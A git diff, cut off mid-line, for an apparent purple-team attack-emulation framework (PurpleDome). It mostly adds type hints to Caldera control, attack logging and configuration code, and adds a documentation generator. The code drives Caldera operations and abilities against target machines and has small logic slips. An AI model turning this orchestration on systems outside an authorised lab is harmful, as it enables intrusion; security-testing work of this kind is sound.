diff --git a/Makefile b/Makefile index 53014cd..c7f1f11 100644 --- a/Makefile +++ b/Makefile @@ -19,4 +19,8 @@ pylint: pylint --rcfile=pylint.rc *.py app/*.py plugins/base/*.py mypy: - mypy app/ \ No newline at end of file + mypy --strict-optional app/ + +# Fixing mypy file by file +stepbystep: + mypy --strict-optional plugins/base/plugin_base.py plugins/base/machinery.py app/config.py plugins/base/caldera.py plugins/base/attack.py plugins/base/sensor.py plugins/base/ssh_features.py plugins/base/vulnerability_plugin.py app/attack_log.py app/calderacontrol.py \ No newline at end of file diff --git a/app/attack_log.py b/app/attack_log.py index 9ab08f0..70f1c5c 100644 --- a/app/attack_log.py +++ b/app/attack_log.py @@ -5,9 +5,10 @@ import json import datetime from random import randint +from typing import Optional -def __mitre_fix_ttp__(ttp): +def __mitre_fix_ttp__(ttp: Optional[str]) -> str: """ enforce some systematic naming scheme for MITRE TTPs """ if ttp is None: @@ -22,12 +23,13 @@ def __mitre_fix_ttp__(ttp): class AttackLog(): """ A specific logger class to log the progress of the attack steps """ - def __init__(self, verbosity=0): + def __init__(self, verbosity: int = 0): """ @param verbosity: verbosity setting from 0 to 3 for stdout printing """ - self.log = [] + self.log: list[dict] = [] + self.machines: dict = [] self.verbosity = verbosity # TODO. As soon as someone wants custom timestamps, make the format variable @@ -41,12 +43,12 @@ class AttackLog(): self.log.append(item) - def __get_timestamp__(self): + def __get_timestamp__(self) -> str: """ Get the timestamp to add to the log entries. Currently not configurable """ return datetime.datetime.now().strftime(self.datetime_format) - def get_caldera_default_name(self, ability_id): + def get_caldera_default_name(self, ability_id: str): """ Returns the default name for this ability based on a db """ data = {"bd527b63-9f9e-46e0-9816-b8434d2b8989": "whoami"} if ability_id not in data: @@ -54,7 +56,7 @@ class AttackLog(): return data[ability_id] - def get_caldera_default_description(self, ability_id): + def get_caldera_default_description(self, ability_id: str): """ Returns the default description for this ability based on a db """ data = {"bd527b63-9f9e-46e0-9816-b8434d2b8989": "Obtain user from current session"} @@ -63,16 +65,16 @@ class AttackLog(): return data[ability_id] - def get_caldera_default_tactics(self, ability_id): + def get_caldera_default_tactics(self, ability_id: str): """ Returns the default tactics for this ability based on a db """ - data = {"bd527b63-9f9e-46e0-9816-b8434d2b8989": " System Owner/User Discovery"} + data = {"bd527b63-9f9e-46e0-9816-b8434d2b8989": "System Owner/User Discovery"} if ability_id not in data: return None return data[ability_id] - def get_caldera_default_tactics_id(self, ability_id): + def get_caldera_default_tactics_id(self, ability_id: str): """ Returns the default name for this ability based on a db """ data = {"bd527b63-9f9e-46e0-9816-b8434d2b8989": "T1033"} @@ -81,7 +83,7 @@ class AttackLog(): return data[ability_id] - def get_caldera_default_situation_description(self, ability_id): + def get_caldera_default_situation_description(self, ability_id: str): """ Returns the default situation description for this ability based on a db """ data = {"bd527b63-9f9e-46e0-9816-b8434d2b8989": None} @@ -90,7 +92,7 @@ class AttackLog(): return data[ability_id] - def get_caldera_default_countermeasure(self, ability_id): + def get_caldera_default_countermeasure(self, ability_id: str): """ Returns the default countermeasure for this ability based on a db """ data = {"bd527b63-9f9e-46e0-9816-b8434d2b8989": None} @@ -99,7 +101,7 @@ class AttackLog(): return data[ability_id] - def start_caldera_attack(self, source, paw, group, ability_id, ttp=None, **kwargs): + def start_caldera_attack(self, source: str, paw: str, group: str, ability_id: str, ttp: str = None, **kwargs): """ Mark the start of a caldera attack @param source: source of the attack. Attack IP @@ -131,6 +133,7 @@ class AttackLog(): "countermeasure": kwargs.get("countermeasure", self.get_caldera_default_countermeasure(ability_id)), # Set by the attack "obfuscator": kwargs.get("obfuscator", "default"), "jitter": kwargs.get("jitter", "default"), + "result": None, } self.__add_to_log__(data) @@ -141,7 +144,7 @@ class AttackLog(): # TODO: Add config # TODO: Add results - def stop_caldera_attack(self, source, paw, group, ability_id, ttp=None, **kwargs): + def stop_caldera_attack(self, source: str, paw: str, group: str, ability_id: str, ttp: str = None, **kwargs): """ Mark the end of a caldera attack @param source: source of the attack. Attack IP @@ -168,11 +171,12 @@ class AttackLog(): "description": kwargs.get("description", ""), "obfuscator": kwargs.get("obfuscator", "default"), "jitter": kwargs.get("jitter", "default"), - "logid": kwargs.get("logid", None) + "logid": kwargs.get("logid", None), + "result": kwargs.get("result", None), } self.__add_to_log__(data) - def start_file_write(self, source, target, file_name): + def start_file_write(self, source: str, target: str, file_name: str): """ Mark the start of a file being written to the target (payload !) @param source: source of the attack. Attack IP (empty if written from controller) @@ -196,7 +200,7 @@ class AttackLog(): self.__add_to_log__(data) return logid - def stop_file_write(self, source, target, file_name, **kwargs): + def stop_file_write(self, source: str, target: str, file_name: str, **kwargs): """ Mark the stop of a file being written to the target (payload !) @param source: source of the attack. Attack IP (empty if written from controller) @@ -220,12 +224,12 @@ class AttackLog(): self.__add_to_log__(data) - def start_execute_payload(self, source, target, command): + def start_execute_payload(self, source: str, target: str, command: str): """ Mark the start of a payload being executed @param source: source of the attack. Attack IP (empty if written from controller) @param target: Target machine of the attack - @param command: Name of the file being written + @param command: """ timestamp = self.__get_timestamp__() @@ -245,7 +249,7 @@ class AttackLog(): return logid - def stop_execute_payload(self, source, target, command, **kwargs): + def stop_execute_payload(self, source: str, target: str, command: str, **kwargs): """ Mark the stop of a payload being executed @param source: source of the attack. Attack IP (empty if written from controller) @@ -266,7 +270,7 @@ class AttackLog(): } self.__add_to_log__(data) - def start_kali_attack(self, source, target, attack_name, ttp=None, **kwargs): + def start_kali_attack(self, source: str, target: str, attack_name: str, ttp: str = None, **kwargs): """ Mark the start of a Kali based attack @param source: source of the attack. Attack IP @@ -295,6 +299,7 @@ class AttackLog(): "description": kwargs.get("description", None), # Generic description for this attack. Set by the attack "situation_description": kwargs.get("situation_description", None), # Description for the situation this attack was run in. Set by the plugin or attacker emulation "countermeasure": kwargs.get("countermeasure", None), # Set by the attack + "result": None, } self.__add_to_log__(data) @@ -304,7 +309,7 @@ class AttackLog(): # TODO: Add config # TODO: Add results - def stop_kali_attack(self, source, target, attack_name, ttp=None, **kwargs): + def stop_kali_attack(self, source: str, target: str, attack_name: str, ttp: str = None, **kwargs): """ Mark the end of a Kali based attack @param source: source of the attack. Attack IP @@ -321,11 +326,12 @@ class AttackLog(): "target": target, "kali_name": attack_name, "hunting_tag": __mitre_fix_ttp__(ttp), - "logid": kwargs.get("logid", None) + "logid": kwargs.get("logid", None), + "result": kwargs.get("result", None), } self.__add_to_log__(data) - def start_narration(self, text): + def start_narration(self, text: str): """ Add some user defined narration. Can be used in plugins to describe the situation before and after the attack, ... At the moment there is no stop narration command. I do not think we need one. But I want to stick to the structure @@ -344,6 +350,42 @@ class AttackLog(): self.__add_to_log__(data) return logid + def start_attack_step(self, text: str): + """ Mark the start of an attack step (several attacks in a chunk) + + @param text: description of the attack step being started + """ + + timestamp = self.__get_timestamp__() + logid = timestamp + "_" + str(randint(1, 100000)) + + data = {"timestamp": timestamp, + "timestamp_end": None, + "event": "start", + "type": "attack_step", + "sub_type": "user defined attack step", + "text": text, + "logid": logid, + } + self.__add_to_log__(data) + + return logid + + def stop_attack_step(self, text: str, **kwargs): + """ Mark the end of an attack step (several attacks in a chunk) + + @param text: description of the attack step being stopped + """ + + data = {"timestamp": self.__get_timestamp__(), + "event": "stop", + "type": "attack_step", + "sub_type": "user defined attack step", + "text": text, + "logid": kwargs.get("logid", None) + } + self.__add_to_log__(data) + def start_build(self, **kwargs): """ Mark the start of a tool building/compilation process @@ -401,7 +443,7 @@ class AttackLog(): } self.__add_to_log__(data) - def start_metasploit_attack(self, source, target, metasploit_command, ttp=None, **kwargs): + def start_metasploit_attack(self, source: str, target: str, metasploit_command: str, ttp: str = None, **kwargs): """ Mark the start of a Metasploit based attack @param source: source of the attack. Attack IP @@ -429,12 +471,13 @@ class AttackLog(): "description": kwargs.get("description", None), # Generic description for this attack. Set by the attack "situation_description": kwargs.get("situation_description", None), # Description for the situation this attack was run in. Set by the plugin or attacker emulation "countermeasure": kwargs.get("countermeasure", None), # Set by the attack + "result": None } self.__add_to_log__(data) return logid - def stop_metasploit_attack(self, source, target, metasploit_command, ttp=None, **kwargs): + def stop_metasploit_attack(self, source: str, target: str, metasploit_command: str, ttp: str = None, **kwargs): """ Mark the start of a Metasploit based attack @param source: source of the attack. Attack IP @@ -451,11 +494,12 @@ class AttackLog(): "target": target, "metasploit_command": metasploit_command, "hunting_tag": __mitre_fix_ttp__(ttp), - "logid": kwargs.get("logid", None) + "logid": kwargs.get("logid", None), + "result": kwargs.get("result", None) } self.__add_to_log__(data) - def start_attack_plugin(self, source, target, plugin_name, ttp=None): + def start_attack_plugin(self, source: str, target: str, plugin_name: str, ttp: str = None): """ Mark the start of an attack plugin @param source: source of the attack. Attack IP @@ -485,7 +529,7 @@ class AttackLog(): # TODO: Add config # TODO: Add results - def stop_attack_plugin(self, source, target, plugin_name, **kwargs): + def stop_attack_plugin(self, source: str, target: str, plugin_name: str, **kwargs): """ Mark the end of an attack plugin @param source: source of the attack. Attack IP @@ -507,7 +551,7 @@ class AttackLog(): } self.__add_to_log__(data) - def write_json(self, filename): + def write_json(self, filename: str): """ Write the json data for this log @param filename: Name of the json file @@ -526,11 +570,24 @@ class AttackLog(): if replace_entry["event"] == "start" and "logid" in replace_entry and replace_entry["logid"] == logid: # Found matching start event. Updating it replace_entry["timestamp_end"] = entry["timestamp"] + if "result" in entry: + replace_entry["result"] = entry["result"] def get_dict(self): """ Return logged data in dict format """ - return self.log + res = {"boilerplate": {"log_format_major_version": 1, # Changes on changes that breaks readers (items are modified or deleted) + "log_format_minor_version": 1 # Changes even if just new data is added + }, + "system_overview": self.machines, + "attack_log": self.log + } + + return res + + def add_machine_info(self, machine_info): + """ Adds a dict with machine info. One machine per call of this method """ + self.machines.append(machine_info) # TODO: doc_start_environment @@ -540,7 +597,7 @@ class AttackLog(): # TODO: Return full doc - def vprint(self, text, verbosity): + def vprint(self, text: str, verbosity: int): """ verbosity based stdout printing 0: Errors only diff --git a/app/calderacontrol.py b/app/calderacontrol.py index cf54039..6b6eb96 100644 --- a/app/calderacontrol.py +++ b/app/calderacontrol.py @@ -7,6 +7,7 @@ import os import time from pprint import pprint, pformat +from typing import Optional import requests import simplejson @@ -14,13 +15,15 @@ from app.exceptions import CalderaError from app.interface_sfx import CommandlineColors + + # TODO: Ability deserves an own class. # TODO: Support all Caldera agents: "Sandcat (GoLang)","Elasticat (Blue Python/ Elasticsearch)","Manx (Reverse Shell TCP)","Ragdoll (Python/HTML)" class CalderaControl(): """ Remote control Caldera through REST api """ - def __init__(self, server, attack_logger, config=None, apikey=None): + def __init__(self, server: str, attack_logger, config=None, apikey=None): """ @param server: Caldera server url/ip @@ -38,7 +41,7 @@ class CalderaControl(): else: self.apikey = apikey - def fetch_client(self, platform="windows", file="sandcat.go", target_dir=".", extension=""): + def fetch_client(self, platform: str = "windows", file: str = "sandcat.go", target_dir: str = ".", extension: str = ""): """ Downloads the appropriate Caldera client @param platform: Platform to download the agent for @@ -56,7 +59,7 @@ class CalderaControl(): # print(r.headers) return filename - def __contact_server__(self, payload, rest_path="api/rest", method="post"): + def __contact_server__(self, payload, rest_path: str = "api/rest", method: str = "post"): """ @param payload: payload as dict to send to the server @@ -78,7 +81,7 @@ class CalderaControl(): raise ValueError try: res = request.json() - except simplejson.errors.JSONDecodeError as exception: + except simplejson.errors.JSONDecodeError as exception: # type: ignore print("!!! Error !!!!") print(payload) print(request.text) @@ -88,7 +91,7 @@ class CalderaControl(): return res # ############## List - def list_links(self, opid): + def list_links(self, opid: str): """ List links associated with an operation @param opid: operation id to list links for @@ -98,7 +101,7 @@ class CalderaControl(): "op_id": opid} return self.__contact_server__(payload) - def list_results(self, linkid): + def list_results(self, linkid: str): """ List results for a link @param linkid: ID of the link @@ -143,7 +146,7 @@ class CalderaControl(): facts = self.__contact_server__(payload) return facts - def list_sources_for_name(self, name): + def list_sources_for_name(self, name: str): """ List facts in a source pool with a specific name """ for i in self.list_sources(): @@ -151,7 +154,7 @@ class CalderaControl(): return i return None - def list_facts_for_name(self, name): + def list_facts_for_name(self, name: str): """ Pretty format for facts @param name: Name of the source ot look into @@ -188,7 +191,7 @@ class CalderaControl(): # ######### Get one specific item - def get_operation(self, name): + def get_operation(self, name: str): """ Gets an operation by name @param name: Name of the operation to look for @@ -199,7 +202,7 @@ class CalderaControl(): return operation return None - def get_adversary(self, name): + def get_adversary(self, name: str): """ Gets a specific adversary by name @param name: Name to look for @@ -209,7 +212,7 @@ class CalderaControl(): return adversary return None - def get_objective(self, name): + def get_objective(self, name: str): """ Returns an objective with a given name @param name: Name to filter for @@ -221,7 +224,7 @@ class CalderaControl(): # ######### Get by id - def get_source(self, source_name): + def get_source(self, source_name: str): """ Retrieves data source and detailed facts @param: The name of the source @@ -231,7 +234,7 @@ class CalderaControl(): "name": source_name} return self.__contact_server__(payload) - def get_ability(self, abid): + def get_ability(self, abid: str): """" Return an ability by id @param abid: Ability id @@ -258,7 +261,7 @@ class CalderaControl(): return True return False - def get_operation_by_id(self, op_id): + def get_operation_by_id(self, op_id: str): """ Get operation by id @param op_id: Operation id @@ -267,7 +270,7 @@ class CalderaControl(): "id": op_id} return self.__contact_server__(payload) - def get_result_by_id(self, linkid): + def get_result_by_id(self, linkid: str): """ Get the result from a link id @param linkid: link id @@ -276,7 +279,7 @@ class CalderaControl(): "link_id": linkid} return self.__contact_server__(payload) - def get_linkid(self, op_id, paw, ability_id): + def get_linkid(self, op_id: str, paw: str, ability_id: str): """ Get the id of a link identified by paw and ability_id @param op_id: Operation id @@ -296,7 +299,7 @@ class CalderaControl(): # ######### View - def view_operation_report(self, opid): + def view_operation_report(self, opid: str): """ views the operation report @param opid: Operation id to look for @@ -310,7 +313,7 @@ class CalderaControl(): } return self.__contact_server__(payload) - def view_operation_output(self, opid, paw, ability_id): + def view_operation_output(self, opid: str, paw: str, ability_id: str): """ Gets the output of an executed ability @param opid: Id of the operation to look for @@ -336,7 +339,7 @@ class CalderaControl(): # ######### Add - def add_sources(self, name, parameters): + def add_sources(self, name: str, parameters): """ Adds a data source and seeds it with facts """ payload = {"index": "sources", @@ -350,12 +353,14 @@ class CalderaControl(): if parameters is not None: for key, value in parameters.items(): facts.append({"trait": key, "value": value}) - payload["facts"] = facts + + # TODO: We need something better than a dict here as payload to have strong typing + payload["facts"] = facts # type: ignore print(payload) return self.__contact_server__(payload, method="put") - def add_operation(self, name, advid, group="red", state="running", obfuscator="plain-text", jitter='4/8', parameters=None): + def add_operation(self, name: str, advid: str, group: str = "red", state: str = "running", obfuscator: str = "plain-text", jitter: str = '4/8', parameters=None): """ Adds a new operation @param name: Name of the operation @@ -393,7 +398,7 @@ class CalderaControl(): return self.__contact_server__(payload, method="put") - def add_adversary(self, name, ability, description="created automatically"): + def add_adversary(self, name: str, ability: str, description: str = "created automatically"): """ Adds a new adversary @param name: Name of the adversary @@ -421,7 +426,7 @@ class CalderaControl(): # TODO View the abilities a given agent could execute. curl -H "key:$API_KEY" -X POST localhost:8888/plugin/access/abilities -d '{"paw":"$PAW"}' - def execute_ability(self, paw, ability_id, obfuscator="plain-text", parameters=None): + def execute_ability(self, paw: str, ability_id: str, obfuscator: str = "plain-text", parameters=None): """ Executes an ability on a target. This happens outside of the scop of an operation. You will get no result of the ability back @param paw: Paw of the target @@ -441,13 +446,15 @@ class CalderaControl(): if parameters is not None: for key, value in parameters.items(): facts.append({"trait": key, "value": value}) - payload["facts"] = facts - print(payload) + # TODO. We need something better than a dict here for strong typing + payload["facts"] = facts # type: ignore + + # print(payload) return self.__contact_server__(payload, rest_path="plugin/access/exploit_ex") - def execute_operation(self, operation_id, state="running"): + def execute_operation(self, operation_id: str, state: str = "running"): """ Executes an operation on a server @param operation_id: The operation to modify @@ -468,7 +475,7 @@ class CalderaControl(): # ######### Delete # curl -X DELETE http://localhost:8888/api/rest -d '{"index":"operations","id":"$operation_id"}' - def delete_operation(self, opid): + def delete_operation(self, opid: str): """ Delete operation by id @param opid: Operation id @@ -477,7 +484,7 @@ class CalderaControl(): "id": opid} return self.__contact_server__(payload, method="delete") - def delete_adversary(self, adid): + def delete_adversary(self, adid: str): """ Delete adversary by id @param adid: Adversary id @@ -486,7 +493,7 @@ class CalderaControl(): "adversary_id": [{"adversary_id": adid}]} return self.__contact_server__(payload, method="delete") - def delete_agent(self, paw): + def delete_agent(self, paw: str): """ Delete a specific agent from the kali db. implant may still be running and reconnect @param paw: The Id of the agent to delete @@ -495,7 +502,7 @@ class CalderaControl(): "paw": paw} return self.__contact_server__(payload, method="delete") - def kill_agent(self, paw): + def kill_agent(self, paw: str): """ Send a message to an agent to kill itself @param paw: The Id of the agent to delete @@ -529,7 +536,7 @@ class CalderaControl(): # Link, chain and stuff - def is_operation_finished(self, opid, debug=False): + def is_operation_finished(self, opid: str, debug: bool = False): """ Checks if an operation finished - finished is not necessary successful ! @param opid: Operation id to check @@ -559,7 +566,7 @@ class CalderaControl(): return False - def is_operation_finished_multi(self, opid): + def is_operation_finished_multi(self, opid: str): """ Checks if an operation finished - finished is not necessary successful ! On several targets. All links (~ abilities) on all targets must have the status 0 for this to be True. @@ -589,7 +596,8 @@ class CalderaControl(): # ######## All inclusive methods - def attack(self, paw="kickme", ability_id="bd527b63-9f9e-46e0-9816-b8434d2b8989", group="red", target_platform=None, parameters=None, **kwargs): + def attack(self, paw: str = "kickme", ability_id: str = "bd527b63-9f9e-46e0-9816-b8434d2b8989", + group: str = "red", target_platform: Optional[str] = None, parameters: Optional[str] = None, **kwargs): """ Attacks a system and returns results @param paw: Paw to attack @@ -625,17 +633,17 @@ class CalderaControl(): self.add_adversary(adversary_name, ability_id) adid = self.get_adversary(adversary_name)["adversary_id"] - self.attack_logger.start_caldera_attack(source=self.url, - paw=paw, - group=group, - ability_id=ability_id, - ttp=self.get_ability(ability_id)[0]["technique_id"], - name=self.get_ability(ability_id)[0]["name"], - description=self.get_ability(ability_id)[0]["description"], - obfuscator=obfuscator, - jitter=jitter, - **kwargs - ) + logid = self.attack_logger.start_caldera_attack(source=self.url, + paw=paw, + group=group, + ability_id=ability_id, + ttp=self.get_ability(ability_id)[0]["technique_id"], + name=self.get_ability(ability_id)[0]["name"], + description=self.get_ability(ability_id)[0]["description"], + obfuscator=obfuscator, + jitter=jitter, + **kwargs + ) # ##### Create / Run Operation @@ -682,9 +690,11 @@ class CalderaControl(): except CalderaError: pass + outp = "" + if output is None: - output = str(self.get_operation_by_id(opid)) - self.attack_logger.vprint(f"{CommandlineColors.FAIL}Failed getting operation data. We just have: {output} from get_operation_by_id{CommandlineColors.ENDC}", 0) + outp = str(self.get_operation_by_id(opid)) + self.attack_logger.vprint(f"{CommandlineColors.FAIL}Failed getting operation data. We just have: {outp} from get_operation_by_id{CommandlineColors.ENDC}", 0) else: outp = str(output) self.attack_logger.vprint(f"{CommandlineColors.BACKGROUND_GREEN} Output: {outp} {CommandlineColors.ENDC}", 2) @@ -704,7 +714,9 @@ class CalderaControl(): name=self.get_ability(ability_id)[0]["name"], description=self.get_ability(ability_id)[0]["description"], obfuscator=obfuscator, - jitter=jitter + jitter=jitter, + logid=logid, + result=[outp] ) return True diff --git a/app/config.py b/app/config.py index 6b19c36..9e95ca8 100644 --- a/app/config.py +++ b/app/config.py @@ -2,6 +2,7 @@ """ Configuration loader for PurpleDome """ +from typing import Optional import yaml from app.exceptions import ConfigurationError @@ -17,7 +18,7 @@ from app.exceptions import ConfigurationError class MachineConfig(): """ Sub config for a specific machine""" - def __init__(self, machinedata): + def __init__(self, machinedata: dict): """ Init machine control config @param machinedata: dict containing machine data @@ -44,12 +45,12 @@ class MachineConfig(): if vmcontroller not in ["vagrant", "running_vm"]: raise ConfigurationError - def vmname(self): + def vmname(self) -> str: """ Returns the vmname """ return self.raw_config["vm_name"] - def get_nicknames(self): + def get_nicknames(self) -> list[str]: """ Gets the nicknames """ if "nicknames" in self.raw_config: @@ -57,88 +58,88 @@ class MachineConfig(): return [] - def vmcontroller(self): + def vmcontroller(self) -> str: """ Returns the vm controller. lowercase """ return self.raw_config["vm_controller"]["type"].lower() - def vm_ip(self): + def vm_ip(self) -> str: """ Return the configured ip/domain name (whatever is needed to reach the machine). Returns None if missing """ try: return self.raw_config["vm_controller"]["ip"] except KeyError: return self.vmname() - def os(self): # pylint: disable=invalid-name + def os(self) -> str: # pylint: disable=invalid-name """ returns the os. lowercase """ return self.raw_config["os"].lower() - def use_existing_machine(self): + def use_existing_machine(self) -> bool: """ Returns if we want to use the existing machine """ return self.raw_config.get("use_existing_machine", False) - def machinepath(self): + def machinepath(self) -> str: """ Returns the machine path. If not configured it will fall back to the vm_name """ return self.raw_config.get("machinepath", self.vmname()) - def get_playground(self): + def get_playground(self) -> Optional[str]: """ Returns the machine specific playground where all the implants and tools will be installed """ return self.raw_config.get("playground", None) - def caldera_paw(self): + def caldera_paw(self) -> Optional[str]: """ Returns the paw (caldera id) of the machine """ return self.raw_config.get("paw", None) - def caldera_group(self): + def caldera_group(self) -> Optional[str]: """ Returns the group (caldera group id) of the machine """ return self.raw_config.get("group", None) - def ssh_keyfile(self): + def ssh_keyfile(self) -> Optional[str]: """ Returns the configured SSH keyfile """ return self.raw_config.get("ssh_keyfile", None) - def ssh_user(self): + def ssh_user(self) -> str: """ Returns configured ssh user or "vagrant" as default """ return self.raw_config.get("ssh_user", "vagrant") - def ssh_password(self): + def ssh_password(self) -> Optional[str]: """ Returns configured ssh password or None as default """ return self.raw_config.get("ssh_password", None) - def halt_needs_force(self): + def halt_needs_force(self) -> bool: """ Returns if halting the machine needs force False as default """ return self.raw_config.get("halt_needs_force", False) - def vagrantfilepath(self): + def vagrantfilepath(self) -> str: """ Vagrant specific config: The vagrant file path """ if "vagrantfilepath" not in self.raw_config["vm_controller"]: raise ConfigurationError("Vagrantfilepath missing") return self.raw_config["vm_controller"]["vagrantfilepath"] - def sensors(self): + def sensors(self) -> list[str]: """ Return a list of sensors configured for this machine """ if "sensors" in self.raw_config: return self.raw_config["sensors"] or [] return [] - def vulnerabilities(self): + def vulnerabilities(self) -> list[str]: """ Return a list of vulnerabilities configured for this machine """ if "vulnerabilities" in self.raw_config: return self.raw_config["vulnerabilities"] or [] return [] - def is_active(self): + def is_active(self) -> bool: """ Returns if this machine is set to active. Default is true """ return self.raw_config.get("active", True) @@ -147,21 +148,21 @@ class MachineConfig(): class ExperimentConfig(): """ Configuration class for a whole experiments """ - def __init__(self, configfile): + def __init__(self, configfile: str): """ Init the config, process the file @param configfile: The configuration file to process """ - self.raw_config = None - self._targets = [] - self._attackers = [] + self.raw_config: Optional[dict] = None + self._targets: list[MachineConfig] = [] + self._attackers: list[MachineConfig] = [] self.load(configfile) # Test essential data that is a hard requirement. Should throw errors if anything is wrong self.loot_dir() - def load(self, configfile): + def load(self, configfile: str): """ Loads the configuration file @param configfile: The configuration file to process @@ -170,11 +171,18 @@ class ExperimentConfig(): with open(configfile) as fh: self.raw_config = yaml.safe_load(fh) + if self.raw_config is None: + raise ConfigurationError("Config file is empty") + # Process targets + if self.raw_config["targets"] is None: + raise ConfigurationError("Config file does not specify targets") for target in self.raw_config["targets"]: self._targets.append(MachineConfig(self.raw_config["targets"][target])) # Process attackers + if self.raw_config["attackers"] is None: + raise ConfigurationError("Config file does not specify attackers") for attacker in self.raw_config["attackers"]: self._attackers.append(MachineConfig(self.raw_config["attackers"][attacker])) @@ -188,7 +196,7 @@ class ExperimentConfig(): return self._attackers - def attacker(self, mid) -> MachineConfig: + def attacker(self, mid: int) -> MachineConfig: """ Return config for attacker as MachineConfig objects @param mid: id of the attacker, 0 is main attacker @@ -196,14 +204,20 @@ class ExperimentConfig(): return self.attackers()[mid] - def caldera_apikey(self): + def caldera_apikey(self) -> str: """ Returns the caldera apikey """ + if self.raw_config is None: + raise ConfigurationError("Config file is empty") + return self.raw_config["caldera"]["apikey"] - def loot_dir(self): + def loot_dir(self) -> str: """ Returns the loot dir """ + if self.raw_config is None: + raise ConfigurationError("Config file is empty") + if "results" not in self.raw_config or self.raw_config["results"] is None: raise ConfigurationError("results missing in configuration") try: @@ -212,12 +226,16 @@ class ExperimentConfig(): raise ConfigurationError("results/loot_dir not properly set in configuration") from error return res - def attack_conf(self, attack): + def attack_conf(self, attack: str) -> dict: """ Get kali config for a specific kali attack @param attack: Name of the attack to look up config for """ + if self.raw_config is None: + raise ConfigurationError("Config file is empty") + if self.raw_config["attack_conf"] is None: + raise ConfigurationError("Config file missing attacks") try: res = self.raw_config["attack_conf"][attack] except KeyError: @@ -227,30 +245,39 @@ class ExperimentConfig(): return res - def get_caldera_obfuscator(self): + def get_caldera_obfuscator(self) -> str: """ Get the caldera configuration. In this case: The obfuscator. Will default to plain-text """ + if self.raw_config is None: + raise ConfigurationError("Config file is empty") + try: res = self.raw_config["caldera_conf"]["obfuscator"] except KeyError: return "plain-text" return res - def get_caldera_jitter(self): + def get_caldera_jitter(self) -> str: """ Get the caldera configuration. In this case: Jitter. Will default to 4/8 """ + if self.raw_config is None: + raise ConfigurationError("Config file is empty") + try: res = self.raw_config["caldera_conf"]["jitter"] except KeyError: return "4/8" return res - def get_plugin_based_attacks(self, for_os): + def get_plugin_based_attacks(self, for_os: str) -> list[str]: """ Get the configured kali attacks to run for a specific OS @param for_os: The os to query the registered attacks for """ + if self.raw_config is None: + raise ConfigurationError("Config file is empty") + if "plugin_based_attacks" not in self.raw_config: return [] if for_os not in self.raw_config["plugin_based_attacks"]: @@ -260,12 +287,15 @@ class ExperimentConfig(): return [] return res - def get_caldera_attacks(self, for_os): + def get_caldera_attacks(self, for_os: str) -> list: """ Get the configured caldera attacks to run for a specific OS @param for_os: The os to query the registered attacks for """ + if self.raw_config is None: + raise ConfigurationError("Config file is empty") + if "caldera_attacks" not in self.raw_config: return [] if for_os not in self.raw_config["caldera_attacks"]: @@ -275,19 +305,26 @@ class ExperimentConfig(): return [] return res - def get_nap_time(self): + def get_nap_time(self) -> int: """ Returns the attackers nap time between attack steps """ + if self.raw_config is None: + raise ConfigurationError("Config file is empty") + try: - return self.raw_config["attacks"]["nap_time"] + return int(self.raw_config["attacks"]["nap_time"]) except KeyError: return 0 - def get_sensor_config(self, name): + def get_sensor_config(self, name: str) -> dict: """ Return the config for a specific sensor @param name: name of the sensor """ + + if self.raw_config is None: + raise ConfigurationError("Config file is empty") + if "sensors" not in self.raw_config: return {} if self.raw_config["sensors"] is None: # Better for unit tests that way. diff --git a/app/doc_generator.py b/app/doc_generator.py new file mode 100644 index 0000000..73a59cc --- /dev/null +++ b/app/doc_generator.py @@ -0,0 +1,45 @@ +#!/usr/bin/env python3 + +""" Generate human readable document describing the attack based on an attack log """ + +import json +import os +from jinja2 import Environment, FileSystemLoader, select_autoescape + + +class DocGenerator(): + """ Generates human readable docs from attack logs """ + + def __init__(self): + self.outfile = None + + def generate(self, jfile, outfile="tools/human_readable_documentation/source/contents.rst"): + + self.outfile = outfile + + env = Environment( + loader=FileSystemLoader("templates", encoding='utf-8', followlinks=False), + autoescape=select_autoescape(), + trim_blocks=True, + # lstrip_blocks=True + ) + template = env.get_template("attack_description.rst") + + with open(jfile) as fh: + attack = json.load(fh) + + rendered = template.render(events=attack["attack_log"], systems=attack["system_overview"], boilerplate=attack["boilerplate"]) + print(rendered) + + with open(outfile, "wt") as fh: + fh.write(rendered) + + def compile_documentation(self): + """ Compiles the documentation using make """ + + os.system("cd tools/human_readable_documentation ; make html; make latexpdf ") + + def get_outfile_paths(self): + """ Returns the path of the output file written """ + + return ["tools/human_readable_documentation/build/latex/purpledomesimulation.pdf"] diff --git a/app/exceptions.py b/app/exceptions.py index e8c764f..181dba1 100644 --- a/app/exceptions.py +++ b/app/exceptions.py @@ -24,3 +24,7 @@ class NetworkError(Exception): class MetasploitError(Exception): """ Metasploit had an error """ + + +class RequirementError(Exception): + """ Plugin requirements not fulfilled """ diff --git a/app/experimentcontrol.py b/app/experimentcontrol.py index 9f5c161..571c2d5 100644 --- a/app/experimentcontrol.py +++ b/app/experimentcontrol.py @@ -6,6 +6,7 @@ import os import subprocess import time import zipfile +import shutil from datetime import datetime from app.attack_log import AttackLog @@ -13,6 +14,7 @@ from app.config import ExperimentConfig from app.interface_sfx import CommandlineColors from app.exceptions import ServerError from app.pluginmanager import PluginManager +from app.doc_generator import DocGenerator from caldera_control import CalderaControl from machine_control import Machine from plugins.base.attack import AttackPlugin @@ -65,11 +67,14 @@ class Experiment(): except subprocess.CalledProcessError: # Maybe the machine just does not exist yet pass - target_1.install_caldera_service() + if self.machine_needs_caldera(target_1, caldera_attacks): + target_1.install_caldera_service() target_1.up() needs_reboot = target_1.prime_vulnerabilities() needs_reboot |= target_1.prime_sensors() if needs_reboot: + self.attack_logger.vprint( + f"{CommandlineColors.OKBLUE}rebooting target {tname} ....{CommandlineColors.ENDC}", 1) target_1.reboot() self.attack_logger.vprint(f"{CommandlineColors.OKGREEN}Target is up: {tname} {CommandlineColors.ENDC}", 1) self.targets.append(target_1) @@ -87,10 +92,16 @@ class Experiment(): a_target.start_sensors() # First start of caldera implants + at_least_one_caldera_started = False for target_1 in self.targets: - target_1.start_caldera_client() - self.attack_logger.vprint(f"{CommandlineColors.OKGREEN}Initial start of caldera client: {tname} {CommandlineColors.ENDC}", 1) - time.sleep(20) # Wait for all the clients to contact the caldera server + if self.machine_needs_caldera(target_1, caldera_attacks): + target_1.start_caldera_client() + self.attack_logger.vprint(f"{CommandlineColors.OKGREEN}Initial start of caldera client: {tname} {CommandlineColors.ENDC}", 1) + else: + at_least_one_caldera_started = True + if at_least_one_caldera_started: + time.sleep(20) # Wait for all the clients to contact the caldera server + # TODO: Smarter wait self.attack_logger.vprint(f"{CommandlineColors.OKBLUE}Contacting caldera agents on all targets ....{CommandlineColors.ENDC}", 